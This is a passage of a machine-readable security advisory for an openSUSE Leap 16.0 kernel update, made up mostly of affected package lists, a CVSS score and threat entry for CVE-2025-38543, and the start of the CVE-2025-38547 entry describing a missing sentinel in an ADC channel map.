"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38543"
},
{
"cve": "CVE-2025-38547",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38547"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: adc: axp20x_adc: Add missing sentinel to AXP717 ADC channel maps\n\nThe AXP717 ADC channel maps is missing a sentinel entry at the end. This\ncauses a KASAN warning.\n\nAdd the missing sentinel entry.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38547",
"url": "https://www.suse.com/security/cve/CVE-2025-38547"
},
{
"category": "external",
